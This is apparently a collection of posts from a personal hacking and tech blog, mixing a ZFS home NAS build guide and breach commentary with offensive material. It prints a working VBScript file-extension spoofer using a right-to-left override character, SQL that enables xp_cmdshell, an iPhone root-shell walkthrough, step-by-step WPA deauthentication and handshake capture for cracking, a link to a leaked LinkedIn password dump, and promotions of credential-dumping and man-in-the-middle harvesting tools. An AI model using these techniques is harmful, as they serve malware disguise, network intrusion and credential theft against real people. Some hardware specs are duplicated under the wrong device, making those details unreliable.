Blogged

Thinking about building or buying a home NAS or file server? While I can’t cover every use case, this article will feature my suggested small build and I’ll come back later for an update that discusses the large build I use (15 hot swap bays, 3 SSD drives, ESXi, ZFS, two LSI HBA adaptors, PCIe passthrough, 32GB RAM beast that currently occupies my closet and hosts all my files and my home lab). There’s a lot to be gained from building your own file server for home. While some of the commercial options offer extreeme simplicity (Drobo), great features and appearance (Synology, Qnap), or very low price (plenty of options here, all seem to come with a severe lack of performance), you could build your own server with many of the same features, hand picked hardware, and you just might end up learning something in the process!

Before we get started, if you get in over your head, go back to the first paragraph and review – there’s some good guidance there. Drobo is dead stupid simple (but be prepared to pay the price), while Synology and Qnap both offer some great hardware and software (and they can act as your Plex Media Server too!) Alright, so let’s begin.

First, I’m assuming you fall into a certain range of needs with this recommendation: This article is for people that need between 2-9TB of available space that will tolerate one hard drive failing at a time (this happens to about 1/10 hard drives in the first 3 years of use. Seriously). If you end up building a NAS that has 5 drives, that means you have about a 50% chance of losing data in 3 years if you aren’t using RAID like I recommend in this how to. Contact me  through Twitter or email if you don’t fall in that category and I’ll try to give you some guidance. There are other dangers too, my recent obsession has been with bit rot and bit error rate which is REALLY important if you’re considering a RAID5 build on SATA drives. So important that you should statistically expect an error after reading 2.2TB of data (oh, and guess what? That’s right at the bottom of the space we’re trying to build a file server to host)

Ok, so a corrupted file is annoying, but it’s not the end of the world, right? Well, sure, except that whole 50% chance of a failed drive thing we just talked about. If the data you’re storing is important, then you need some way to be sure it can survive these failed drives, something a little more assuring than a coin toss. That answer is RAID. If you haven’t heard of RAID before, go grab a Drobo and save yourself some time and frustration. But if you’re comfortable with RAID, let’s talk about what you’ve probably been using for data archival. RAID5. RAID 5 is awesome, right? Sure. At least it was back in the 90′s before we started talking about single drives that were in the 250GB to 500GB range. Around that point (maybe 5 years ago?) we started running into a wall. Since RAID5 uses all disks (except the parity) to calculate a stripe of data, any bit rot on any of the disks equals corrupted data. Also, if you do have a disk failure, you have to read all the data from every disk to recover, and since we’re talking about an expected error for every 2.2TB, then during a recovery of a 4x3TB disk system (12TB physical, 9TB available) you can expect 2-3 corrupted stripes, killing off probably a few files.  That sucks.

So if I’m telling you we have a major issue, and that we’re almost certainly going to get some errors while reading back data from this new NAS/file server I want to explain how to build, then there has to be a solution, right? Well, there is! 

ZFS (Zettabyte File System) works on a high level a lot like RAID5 systems. But:

• It can use 1, 2, or even 3 parity drives (RAID 5 or RAID 6 do 1 or 2 disk parity, respectively)
• It can recover from a failed drive without reading every single block of data from every remaining drive. ZFS knows which blocks are used, and will only read those blocks. This means if you are using 50% of your array, your recovery is 50% faster, and 50% less likely to have a bit error
• ZFS keeps checksums of blocks, this is important because of the next feature
• It can scrub a healthy array to identify and even repair bit rot. Since you have a parity and 3 or more disks that add up to that parity, ZFS can identify that a stripe is corrupt and because it stores a checksum, it can attempt to recover the block by rotating the stripe form one disk at a time until the checksum is correct
• ZFS has some awesome enterprise features you could only dream about on a home server until now
• Unlimited filesystem snapshots (how do you feel about recovering your system to exactly as it was in July 25th, 2009 at 6PM? ZFS can do that if you’ve taken hourly or daily snapshots since then)
• On the fly data compression. ZFS can compress data as it is written to disk. This can actually speed up your read/write speeds because although your physical disks may only be able to write at 100MB/s, if the data is 50% the size after compression, it can effectively be written at 200MB/s on that same physical disk.
• SSD Cache. Yep, this is the same kind of stuff (local tiered storage) that Dell, EMC, NetApp and others sell even “entry level” systems starting at tens of thousands of dollars, but for free (as in beer and as in speech).
• Datasets – these are just awesome. In ZFS there aren’t partitions, there are datasets. These can be used to manage settings for “partitions” of ZFS RAIDs. They can be used to create individual mount points, each sharing the data of the full RAID, but each potentially set up with individual snapshots, limits to how much data they can use, reserved space, compression settings, and more.
• This one I hesitate to mention because it’s designed for systems with TONS of RAM, more than we’ll be including in this hardware. ZFS can do block level deduplification.  It works best with 2GB or more RAM per TB of space, so don’t turn this on unless you’ve got something like 16GB of RAM in your file server.
• Plenty of other nice bits as well, like automatically creating mount points for your ZFS disk RAIDs (called pools) and datasets, built-in monitoring utilities, configuration management tools and more

Ok, so there it is. Sold yet?

Let’s talk about an example build. I’ll update this post tomorrow with hardware I’d recommend for a low power, 4 disk home NAS using ZFS.

Quick sneak peek:

• HP ProLiant N40L Micro Tower Server ($319) http://www.newegg.com/Product/Product.aspx?Item=N82E16859107052
• 4 x Western Digital Red ($129.99×4 = $519.96) http://www.newegg.com/Product/Product.aspx?Item=N82E1682223634
• USB Flash drive ($17.99) http://www.newegg.com/Product/Product.aspx?Item=N82E16820220253

Optional

• 8GB Unbuffered ECC Memory ($55.99) http://www.newegg.com/Product/Product.aspx?Item=N82E1682013926
• 120GB Intel 520 Series SSD ($129.99) http://www.newegg.com/Product/Product.aspx?Item=N82E16820167095

The SSD really isn’t needed for file server purposes, but if you’re interested in having an SSD cache, it’ll let you hit some crazy IOPs for cheap, plus really speed up directory listing and some other nice little performance boosts. 8GB of RAM I’d recommend but you can survive just fine on the 2GB stick that comes with it (albeit without a few nice performance improvements).

So that’s the basic hardware. An 8TB (6TB will be usable for storage) ZFS NAS starting at $856, or $1042 for an all out beast of a box that should handle hosting your home lab without much issue. The hardware is all designed for very low power usage, somewhere around 30-32 watts idle (with disks) and 37-45 watts under load (based on what others have reported).  It’ll blow away anything you can get from the likes of Drobo, Synology, or Qnap until you start talking prices in the $550-$850 range before even buying the drives.

[geek.com]

[news.cnet.com]

What the FUD is wrong with news outlets these days? Sheeh, even some security researchers from “Aperture Labs” (yeah, seriously that’s their name) got involved and PRESENTED at a security conference about it.
I realize, these are some older articles, but having noticed a Google search term “apple square card reader hack” hit my site, I did some googling around for new news. What I found out disgusted me. We have researchers presenting that these things are insecure, and that they’ve totally hacked the system… That’s like saying “Hey, check this out! If I have a credit card, I can charge things to it!!! I’m going to present at a security conference about it now”

See my previous article for more ranting… and a lot more technical explanation of the “issue”

[TechByTom.com - Verifone Spreads FUD]

End rant.

Here’s one extension spoofer you can trust (vbscript code provided)

'========================================================' ' ' ' EXTENSION SPOOFER ' ' CODED BY DJ MAK ' ' http://hackwithmak.tk ' '========================================================' Call Spoof Sub Spoof() dim filePath,fileName,exten,FileLen,revExten,dest,NewFileName set fs = CreateObject("Scripting.FileSystemObject") filePath=inputbox("Enter The FilePath") exten=inputbox("Enter the Extension to spoof" & vbCrlf & _ "Example : .jpg, .mp3 , .avi , etc..") fileName=fs.GetFileName(filepath) filePath=fs.GetParentFolderName(filepath) FileLen=Len(fileName)-4 Dim spclChar spclChar = ChrW(8238) revExten=StrReverse(exten) NewFileName=inputbox("Enter the new file name max 5 chars") dest=NewFileName & spclChar & revExten & mid(fileName,FileLen+2) fs.copyFile filePath & "\" & Filename,filePath & "\" & dest msgbox "Extension Spoofed Successfully!!",vbInformation end sub

Test

This requires acces as the ‘sa’ user. By default, you’ll be locked out after 3 failed attempts, so good luck with that :)

– To allow advanced options to be changed.
EXEC sp_configure ’show advanced options’, 1
GO
– To update the currently configured value for advanced options.
RECONFIGURE
GO
– To enable the feature.
EXEC sp_configure ’xp_cmdshell’, 1
GO
– To update the currently configured value for this feature.
RECONFIGURE
GO

References:

[hackwithmak.tk]

Here we go again. While it’s hardly a surprise to me, another “cloud” service has been confirmed compromised. After notifying customers and downplaying the potential threat to their data, Dropbox drops the big one – yup, they were compromised, yup, hackers gained access to “a small number” of customer’s accounts and data, and how do they handle the announcement? Well, they hide it in a “new features” announcement of course! See the post on their blog here: [blog.dropbox.com]

So what can we learn from this example?

Cloud providers are companies

Let’s pretend for a moment that you own a company that has tens of millions of customers relying on you to keep their data secure. From humble beginnings, you grew with the help of investors to what you are today in under 5 years. You’ve been featured on Forbes magazine, heck, they even named you named “Tech’s hottest startup” [forbes.com]. Now here’s the problem, you have a history of security flaws – like this one and this damning article here too. So today, you wake up to your super cool Blackberry (heh) buzzing away like crazy. What could this be? Oh great, customers are reporting some bogus targeted phishing scam. No big deal – except when you make it into the office, things start to fall into focus. It looks like this might just be a real deal compromise. Someone, somehow seems to have obtained a fairly substantial list of valid customer names. So what do you do?

If you answered downplay it like there’s no tomorrow, then promise a full investigation, then congrats, you’re thinking like a business owner in full damage control mode. And guess what? That’s just exactly what happened! First, as mentioned above, users noticed they were getting some very targeted phishing attacks two weeks ago. After a week of complaints, DropBox semi-officially acknowledged that some email addresses had been leaked. They were quick to follow up with some great news no one had accessed any accounts! Yay! That security team we hired said they hadn’t found anything yet.

But wait!

Just kidding! Yeah, actually DropBox was compromised, and awesomely enough, some accounts were accessed, and yup, some hackers were able to get data out of those accounts. Of course, since you don’t want to just announce something like that without a fix, customers were kindly left to wait around for what we can only assume was at least a few extra days while DropBox figured out some super great new features in response to the issue! So don’t worry, it’s all good now (riiight). Here’s the full blog post if you choose to read it. Security update and new features. If you look back on that blog, you’ll notice a few things.

1. They only used their official blog to mention that they had a “security update” AND added new features. Good marketing work there, wouldn’t want to alarm your customers or investors, DropBox.
2. Looking back, you’ll probably notice that the blog was never used to announce ANYTHING about the breach until now. Oh, but they added OS X Lion support on the 25th, so cool beans.
3. We can only assume they located the actual point of entry and have resolved the issue by now. Let’s just hope, since I doubt they’ll ever mention this little boo boo again.

Believe it or not, DropBox is a company, and companies are primarily concerned about how to make the highest profit possible. This is how businesses work. So every time you decide it might be cheaper to have someone else store your data, just realize that their goal will be to make money AND store your data. In other words, unless you’re getting some additional services you couldn’t otherwise get without them, you could probably do it cheaper on your own.

So here’s where the problem lies: Cloud providers are bigger targets than your small/medium business or home. If a hacker can find a way in to Microsoft’s cloud, or Amazon EC2 or DropBox, or GoToMyPC or any of the other thousands of Cloud services out there there, then they also get access to all of the data that respective service controls. And THAT is way more interesting than plucking away on a few computers or individual targets at a time. They may have slightly more competent security, but the payoff is huge if just one hacker gets in. So go enjoy your cloud services, I’ll be keeping my data on my own systems where I know exactly who has access to it and when.

5 years ago today (or sometime in the middle of the night last night), I had shell access (and a compatible binary) on my 8GB iPhone running iPhoneOS 1.0.0 (and not long after, iPhoneOS 1.0.1). This was the start of what we now known as a “Jailbreaking” (or what was called “breaking out of jail” at the time), and what I believe is the reason we can run third party apps on the iPhone and iPad today.

What a great example of how hacking can really change (and help) a company or product. Would the iPhone and iPad have been anywhere near as successful as they are today? Would you have purchased an iPhone if there never was an App Store? That was Steve Job’s original plan, all “apps” would have always been javascript based. (See reference here: [cultofmac.com])

I had been involved in the hackintosh community for a few years (pretty well since the first successful install of OS X on a standard Intel box. Go check out [voodooprojects.org] by the way. Having been hacking away on the insides of OS X, the idea of having a compact (at the time) touch screen phone running an ARM derivative of the same OS I’d been hacking around on sounded like lots of fun. And I was sold, even at the outrageous original asking price (ouch!).

Here’s Nate True’s instructions for breaking out of jail can be found below, though I took a slightly different approach and was doing all the work from my Hackintosh:

Step 1: Key Creation

Mac: Download dropbear from here:

    http://matt.ucc.asn.au/dropbear/dropbear.html
    Run: ./configure && make
    You don't need to install the software, just run:

PC: download dropbearkey.exe from here

BOTH: Run these commands to generate keys for dropbear:

    ./dropbearkey -t rsa -f dropbear_rsa_host_key
    ./dropbearkey -t dss -f dropbear_dss_host_key

And copy the two new key files into your iPhoneInterface directory.

Step 2: Uploading dropbear and friends

    Download the iphone-ssh kit and the iphone binaries kit:

        http://www.abigato.com/iphone-ssh-kit-vr1.tar.bz2
        http://netkas.freeflux.net/blog/

    Rename sh6 from the kit to sh.

    Use the jailbreak application to break out of jail, and then open
    iPhoneInterface to connect.

    mkdir /etc/dropbear
    cd /etc/dropbear
    putfile dropbear_rsa_host_key
    putfile dropbear_dss_host_key
    cd /bin
    putfile chmod
    putfile sh
    cd /usr/bin
    putfile dropbear

Step 3: Overwriting 'update' with 'chmod'

    While still connected to iPhoneInterface, make a backup copy of
    /usr/sbin/update:

    cd /usr/sbin
    getfile update

    Rename this to update.original on your local filesystem

    Now copy the 'chmod' binary to 'update' and upload it back to the
    iPhone:

    cd /usr/sbin
    putfile update

Step 4: Overwriting the update configuration

    Now the 'update' binary is really 'chmod', and has execute permissions! We
    just need to tell the iPhone to chmod next time it boots. To do this, we
    download /System/Library/LaunchDaemons/com.apple.update.plist and add our
    own arguments to ProgramArguments:

    0 /usr/sbin/update
    1 555
    2 /bin/chmod
    3 /bin/sh
    4 /usr/bin/dropbear

    Save the new plist and upload it back to the iPhone:

    cd /System/Library/LaunchDaemons
    putfile com.apple.update.plist

    While we're here, lets also:

    putfile au.asn.ucc.matt.dropbear.plist

Step 5: Reboot the iPhone twice.

    The first reboot should set the permissions on the dropbear and related
    binaries. The second reboot should start dropbear, so you can ssh to it:

    ssh -l root [IP ADDRESS]
    The root password is 'dottie'.

Step 6: Replace the original update and com.apple.update.plist files

    Don't forget to put the old update files back. Rename update.original back
    to update, and delete the extra ProgramArguments you added to
    com.apple.update.plist. Now put them back:

    cd /System/Library/LaunchDaemons
    putfile com.apple.update.plist

    cd /usr/sbin
    putfile update

Step 7: Change the root password

    If you don't like 'dottie', you can generate a new encrypted password
    by running:

    perl -e 'print crypt("MYPASSWORD", "XU");'

    Where MYPASSWORD is the new password you want, and XU is a random two-letter
    salt. Copy the encrypted output and replace the existing one in
    /etc/master.passwd on the phone.

You're done! Enjoy!
-NerveGas

I found this tutorial very well done, even used it for reference to update a couple things I’m doing. Felt like I should save it someplace, so here it is!

Trying to capture a 4-way TKIP handshake without help can involve sitting and watching traffic for hours and hours, waiting for a client to connect to a network. By using a tool called aircrack-ng we can forcefully deauthenticate a client who is connected to the network and force them to reconnect back up. During the process of re-exchanging the encrypted WPA key, you will capture a handshake. In order to forcefully capture a 4-way handshake, you will need to deauthenticate a client computer that is actively using services, forcing it to exchange the WPA key and in turn capturing the handshake that can be decrypted.

Things you will need in order to complete this exercise:

• A copy of Linux with the program aircrack-ng installed and wireless drivers patched for injection (I recommend Backtrack-linux since it has all these things already)
• A compatible wireless card. You can check the Aircrack-ng HCL for compatible cards
• A wireless access point with WPA/WPA2 PSK encryption
• Another device or computer connected to the access point

Step 1: Put the interface in monitor mode.
Assuming you are booted up and ready to go, you’ll need to put the interface in monitor mode and get ready to start dumping packets from your target network.

wlan0 is your network interface device:

Step 2: Start capturing traffic from the target access point and prepare to deauthenticate a client.
You need to start capturing all the packets in order to capture a 4-way handshake for the target network. You can tell airodump-ng exactly which channel to listen on, and to filter out all other wireless devices except the one we are attacking. Be sure to leave this window open and running.

Required Airodump Switches:

• -c specifies the channel to listen on
• –bssid specifies the target MAC address
• –showack tells airodump to give verbose ACK related information
• -w specifies the file to save the handshake to

Example airodump-ng output:

If you do not yet know the bssid of the target you can omit that part of the command to see a list of all access points on the specified channel. You should at this point take note of the mac address or bssid of the target access point and the mac address of the connected client you are going to deauthenticate.

Step 3: Deauthenticate the client who is already connected and force them to exchange the WPA key as they connect.

Open a new terminal and deauthenticate the victim from the target network.

Required Aireplay Switches:

• -0 6 tells aireplay to inject deauthentication packets. The 6 is the number of packets we wish to send.
• -a is the wireless access point MAC address
• -c is the client MAC address.

Example of a deathentication session:

A successful attack will show ACKs, which indicates that the victim who is connected to the access point has acknowledged the disconnect we just issued. It is possible to send just 1 deauthentication request, but depending on the range of you to the target wireless network sometimes more than 1 request is needed.

Step 4: Ensure you have captured the 4-way handshake.
Going back to the airodump-ng terminal which should still be running and collecting packets we can look in the upper right hand corner to see the programs acknowledgment that we have indeed captured a WPA handshake. This can also be done by running aircrack-ng on the capture file.

Example aircrack-ng output

Step 5: Upload the handshake to ph33rbot.com
Since running a dictionary attack against a WPA handshake can be a long drawn out cpu intensive process, Question-Defense has a online WPA password cracker which can be used to test your capture. The process is simple. Access the web interface here and fill in the required information. You will be charged a small fee of ten dollars to test your capture against a wordlist made up of around 540 million words and the results will be returned to you in a few hours via email.

Example of correct upload:

Sources: [question-defense.com]

[sites.google.com]

I found this article interesting [ihnatko.com] It’s a classic example of the old security vs features argument. Maybe developers could look at security like it’s a feature and advertise it instead of complaining and forgoing all explanation of the benefits of making security a priority?

“Time, money, and resources that developers could be investing in making a great product even better must instead be spent just to keep their software working“

Let’s try the security minded view of that complaint:

“Time, money, and resources that developers could be investing in making a great product even better must instead be spent to make their software more secure”

Here’s something that might be a surprise to you if you don’t work in infosec: developers don’t often care about security. Boo hoo, we have to do that stupid sandboxing security BS, why can’t we just keep on making new features while everyone pokes fun at OS X for having security holes?

Perhaps Apple doesn’t make the most secure desktop operating system right now, but they’re making steps in the right direction.

• Open google-chrome located in /usr/bin with nano or your favorite text editor.

gedit /usr/bin/google-chrome

• Add “–user-data-dir” to the end of the file. Example below:

exec -a "$0" "$HERE/chrome" "$@" --user-data-dir

I’m pretty sure this can be accomplished through a script by echoing  –user-data-dir to the end of the file, but echo -n doesn’t seem to work with the built in echo for Backtrack. Suggestions are welcome!

I’m currently reading through a list of passwords containing a lot of occurrences of “linked” “linkedin” and “link” They come from a dump of 6.5 million password hashes posted online last night. If you’ve used your LinkedIn password on other sites, go change it on those sites now, and prepare to change it on LinkedIn after they figure out what happened and close the hole (if they were even hacked).

You can download the LinkedIn password dump here: [disk.yandex.net] I’m starting to doubt the legitimacy of the “dump” though.

More to come…

Update 1:

Doing a little research and it looks like the sha1 hash for my password does not appear in the dump. It may be possible that the hashes have been generated to look like they’re a LinkedIn dump.

@schuetzdj and @i0n1c both confirmed that the sha1 hash of their password is also not in the dump. Something’s up here ladies and gents.  Another one checks in @jetmotor confirms sha1 hash not there.

Update 3: (sorry it’s out of order)

If the hash of your password does not appear in the dump, check if your hash with the first 5 characters changed to 00000 does…

Update 2:

And here comes the sensationalists. “More than 6.4 million LinkedIn passwords have leaked to the Web after an apparent hack. Though some login details are encrypted, users are advised to change their passwords immediately.” Doesn’t pay to fact check I guess. Sounds like they have no idea what they’re looking at in the thread it’s posted in either.

Another quick update. Yup, the verge is reporting the LinkedIn hack as if it’s a fact as well.

[theverge.com]

Quarkspwdump grabs local and domain cached credentials from remote machines by supplying a local admin account on that machine. Enjoy!

http://code.google.com/p/quarkspwdump/

Quick script to get domain admin with local admin access. I’ve used similar scripts in the past. The last line in this one is particularly nasty though.

[www.n0where.net]

https://sites.google.com/site/0×7674/home/sqlite3injectioncheatsheet

These could be helpful…

https://sites.google.com/site/0×7674/home/newbeefmodule-prettytheft <- lightbox esque “re-authentication” request.

Plenty of fun to come. ;)

Check out the work here by malware.lu. Some interesting reads for sure!

[code.google.com]

Free MD5 reverser available here: [md5hacker.com]

I’m sure there are plenty, and I love BozoCrack too, but this one is easy to access even from a phone.

It’s another Tuesday, and it’s time for another cool tool. This week’s tool is Easy Creds. It’s a simple and easy to use open source script for Linux which helps an attacker easily acquire valid credentials by automating the man in the middle and interception process. It even includes some great tools like Fake AP and SSLStrip to make some of the more advanced credential harvesting techniques easy.

[code.google.com]

I’m really quite excited about the idea of wearing a pebble watch. Yeah, I it’s a little geeky, but the idea of having a watch that can connect to my other devices (including my phone) is just really interesting. I can’t wait to see what some people come up with.  It could use the iPhone’s location services to handle changing time zones, the ability to notify me of texts, calendar alerts, etc without removing my phone from my pocket is just really exciting.

And then there’s the hacking potential… I already use the bluetooth in my iPhone to detect when I’m home (and make lighting/HVAC home automation decisions based on that info), but what if I use my watch instead? That could have some benefits since I’m more likely to keep it attached than a phone.

Anyhow, just wanted to see who got in on the first round of 85,000 of these watches. At $125 I felt like it was worth the asking price and then some.

This week’s cool tool inspired one of my latest private exploits, something that is just way too fun…

But anyways, back to the tool. This week I’m featuring Subterfuge, an Automated Man-in-the-Middle Attack Framework. Subterfuge includes a plugin framework for exploiting Man-in-the-Middle attacks. Plugins are included for things like session hijacking, Network enumeration, credential harvesting, fake dhcp and more.

Version 2.0 beta just hit, so go check it out and feel free to share your experiences in the comments.

[code.google.com]

I’ve been doing some research on what I’ve come to call disposable computing over the last year. As the price of a fully functioning computer drops below the $100 mark, it quickly lands in a place where a new risk arrives for many of my clients. Imagine if you had access to a small computer with wifi, bluetooth, 3G, plenty of RAM, GBs of storage and enough processing power to at the very least, tunnel back anything it sees to a C&C center. Now look at your smartphone. Yup. And imagine how much damage you could do with all those radios accessible if it were to be dropped someplace or shipped to someone that was out of town.

But this isn’t just about smartphones, because frankly, even those are really expensive in comparison to what I’ve been looking at. Here’s my current list (please comment on anything I’ve missed!):

• TP-Link TL-WR703N router ($22)
• Atheros AR7240 CPU (400Mhz)
• Atheros AR9331 Chipset (integrated wireless)
• 802.11 b/g/n 150Mbps (130Mbps real)
• wireless power output 20dBm – 100mW
• 4 MB flash memory
• 32 MB RAM
• USB 2.0 port
• Powered via micro-USB socket
• Tiny form factor: 5.7cm x 5.7cm
• TP-Link TL-MR3020 router ($35)
  • Same as TP-Link TL-WR703N but with 6.7cm x 7.4cm x 2.2cm case
• SheevaPlug ($99)
• 1.2 GHz ARM Marvell Kirkwood 88F6281
• 512 MB flash memory
• 512 MB RAM
• Gigabit Networking
• USB 2.0 port (No onboard wireless, so bring your own)
• Powered via power outlet and looks like an AC adaptor
• Form factor: 4.33in x 2.74in x 1.91
• Fon 2200 (Used by the Wifi Pineapple, hard to get)
• 186Mhz Processor and not much RAM, meh
• Seagate DockStar ($75 or less)
• 1.2 GHz ARM Marvell Kirkwood 88F6281
• 256 or 512 MB flash memory
• 128 MB RAM
• Gigabit Networking
• 4x USB 2.0 ports (No onboard wireless, so bring your own)
• Seagate GoFlex Net ($90 or less)
• 1.2 GHz ARM Marvell Kirkwood 88F6281
• 512 MB flash memory
• 128 MB RAM
• Gigabit Networking
• 1x USB 2.0 ports (No onboard wireless, so bring your own)
• 2x SATA II ports
• Raspberry Pi ($25 or $35)
• 700 MHz ARM1176JZFS
• SD card slot for local storage
• 256 MB RAM
• 10/100 Networking (on Model B only)
• 1x USB 2.0 port on Model A, 2x USB port on Model B (No onboard wireless, linux compatibility list available)
• Powered via micro-USB socket
• PogoPlug v2 ($25 or $35)
• 700 MHz ARM1176JZFS
• SD card slot for local storage
• 256 MB RAM
• 10/100 Networking (on Model B only)
• 1x USB 2.0 port on Model A, 2x USB port on Model B (No onboard wireless, linux compatibility list available)
• Powered via micro-USB socket
• Rikomagic MK802 ($75)
• 1.5 GHz AllWinner A10 SoC
• Micro SD card slot for local storage
• 512 MB RAM
• 1x USB 2.0 port
• 802.11 b/g Wi-Fi
• Powered via USB @2 watts